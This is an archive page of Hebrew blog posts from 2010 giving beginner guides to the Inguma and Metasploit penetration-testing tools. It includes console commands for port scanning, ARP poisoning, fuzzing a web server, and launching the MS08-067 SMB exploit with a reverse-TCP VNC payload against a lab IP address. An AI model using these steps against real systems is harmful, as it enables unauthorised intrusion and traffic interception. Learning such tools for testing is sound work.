‏הצגת רשומות עם תוויות exploits. הצג את כל הרשומות
‏הצגת רשומות עם תוויות exploits. הצג את כל הרשומות

יום שני, 27 בדצמבר 2010

Inguma - Starting Guide

כלי Penetration Test נוסף שקיים ב Backtrack ,הוא נכתב ע"י Joxean Koret בשנת 2006 ומאז יצאו מספר גרסאות, גם הוא מבוסס על  שפת Python בדומה ל Scapy, מאפשר מגוון רחב של אפשריות החל מסריקת פורטים עד הפעלת Exploits ו Fuzzers.


 יש לכלי הזה הרבה אפשריות נחמדות שניתן להשיג גם בכלים אחרים אבל עדיין הוא מומלץ לשימוש לפי דעתי בגלל הפשטות והיעילות שלו, הוא מכסה התקפות רבות, ובשנת 2007 נבחר מקום שני כתוכנת האבטחה הטובה ביותר ע"י security-database.com.

התוכנה מאוד מזכירה את Scapy בצורת העבודה, ובעצם עובדים עם אובייקטים ופקודות כחלק מ Python וגם פה יש לנו אובייקט שאותו צריך להגדיר בשונה מ Scapy שעשתה לנו חבילות מידע "מלוכלכות" פה האובייקט לא מדבר על ה Packet עצמו אלא יותר בכיוון המכונה שאנו מעוניינים לתקוף ובעצם הפרמטרים הרבה יותר פשוטים להעמסה ולא צריך להיות גאון Tcp/ip  על מנת להפעיל אותה.

הכלי נוגע במספר עולמות:

  • חשיפות של שירותים על הקורבן.
  • איסוף אינפורמציה על הקורבן.
  • התקפות Brute Force על הקורבן.
  • הפעלות Fuzzer על תוכנות שרצות על הקורבן.
  • הפעלת Exploits על הקורבן.
inguma> show options
מציגה לנו את האובייקט של המטרה שלנו



העמסת המטרה:
inguma> target = '192.168.1.105'

בחירת Port:
inguma> port = 80


פונקציות:

inguma> identify
יחזיר לנו את ה Service שעובד על הפורט.

inguma> tcpscan
יחזיר לנו את הפורטים שפתוחים לנו במכונה בפרוטוקול Tcp

inguma> isnated
אם הפורט מאחורי NAT

inguma> whois
חיפוש של ה Hostname בשרתי Dns.

inguma> arping
קבלת MAC address של המטרה.

inguma> fakearp
זיוף Arp

inguma> nikto
חיפוש קבצים לא מאובטחים על ה Web server

inguma> arppoison
Arp Poisoning

קיימים בתוכו עוד מספר כלים נוספים כמו: Sniffer, Smbclient ולהם אפשריות נפרדות.
inguma> sniffer
SNIFFER> help
SNIFFER> run




יש 2 תוספות נוספות ,הן מופעלות בנפרד ומשתמשות בסקריפטים של Inguma:

OpenCid - כלי לחיפוש חולשות אבטחה בקבצים בינארים.
Krash - זה הוא ה Fuzzer שמגיע עם Inguma שעליו אני אפרט איך לתקוף Web server.

שלב ראשון - הכנות:
לכידת Packet של ה Get  שעוברת מהתוקף לנתקף, ניתן לבצע את הלכידה בעזרת WireShark.



ה Packet שלנו יראה משהו כזה



נשמור את הקובץ לדוגמה: http_packet.http בספריה
#: /pentest/exploits/inguma/krash/audits/http_packet.http

שלב שני - הפעלת ה Fuzzer:
#: /pentest/exploits/inguma/krash/ ./krash.py audits/http_packet.http 192.168.1.105 0

שלב שלישי - בדיקות:
ה Fuzzer יערבל לנו את ה Packet ויוסיף לתוכו תוספות שבעזרתם ינסה להפיל את השירות של ה Web Server על מנת לראות אם זה עובד נחזור בחזרה ל WireShark ונראה אם תוכן ה Packet המקורי שאספנו בהתחלה השתנה.



לאתר Inguma

בהצלחה... 

יום שלישי, 7 בדצמבר 2010

Metasploit Framework Starting Guide



כמו שאמרתי במאמר הקודם על Metasploit ניתן לעבוד עם ה Framework בכמה דרכים, 2 הדרכים הנוחות יותר לעבודה הן ה GUI וה WEB שם הכל מוגש על מגש של זהב מה שנשאר לך זה לבחור את ה Exploit שאתה רוצה ופשוט להפעיל אותו בסביבה כלכך נוחה אבל האקרים אמיתיים מעדיפים את ה Console למרות שלפעמים אתה שואל את עצמך למה?! הרי יש לך ממשקים כלכך נוחים ועדיין מעדיפים את ה Console אבל כנראה שהרגלים לא פשוט לשנות והפעם אני יסביר איך משתמשים ב Console .

אני יסביר את העבודה עם ה Console ע"ג BACKTRACK.

דבר ראשון נפעיל את ה Console



על מנת לראות את כל ה Exploits שב Framework

msf > show exploits
על מנת להשתמש ב Exploit
msf > use windows/smb/ms08_067_netapi

לאחר שבחרנו את ה Exploit נראה איזה Payloads ניתן לטעון בו:
msf > show payloads

על מנת לראות את הפרמטרים שב Exploit
msf > show options

טעינת הפרמטרים בערכים:
msf > set RHOST 192.168.1.105

טעינת ה Payload ל Exploit
msf > set payload windows/vncinject/reverse_tcp

הפעלת ה Exploit
msf > exploit

והפעלתם את ה Exploit.

בהצלחה...

יום שבת, 27 בנובמבר 2010

Metasploit Framework



אחד הכלים החזקים שקיימים ל Penetration Test , בעצם איחוד של המון סוגי פריצות בשפות שונות ל Framework מרכזי, ניתן לבצע מגוון סוגים של פריצות עבור מערכות הפעלה שונות.

במאמר זה נעשה סקירה מהירה כיצד בדיוק עובדים עם המערכת ואת התוצאה הסופית של הפריצה.

ה Framework מגיעה מובנה עם גרסאות של המערכת BackTrack אך ניתן להוריד אותו למערכות לינוקס אחרות וכמובן גרסת Windows, המערכת מגוונת בממשקים שלה ניתן לעבוד איתה ב 3 ממשקים שונים - Console,Web,Gui
לאתר Metasploit

הקורבן שלנו הוא Windows Server 2003 SP2.

תחילה יש לבחור את ה Exploit שאיתו נבצע את הפריצה אחד הנפוצים לשימוש במערכות Windows הוא: MS08_067_NETAPI שמבוסס על הפרוטוקול SMB - server message block.

לאחר מכן נגדיר את הפרמטרים RHOST למכונה שאותה אנו מעונינים לפרוץ במקרה שלנו ל Windows server 2003 שבכתובת 192.168.1.108.

נשאר לנו לבחור מה בדיוק אנחנו רוצים שהפריצה תעשה (PAYLOAD) - לפתוח לנו Command Line מרוחק , לפתוח לנו חיבור מרוחק ב VNC והמון אפשריות אחרות.

לסיום נריץ את ה Exploit.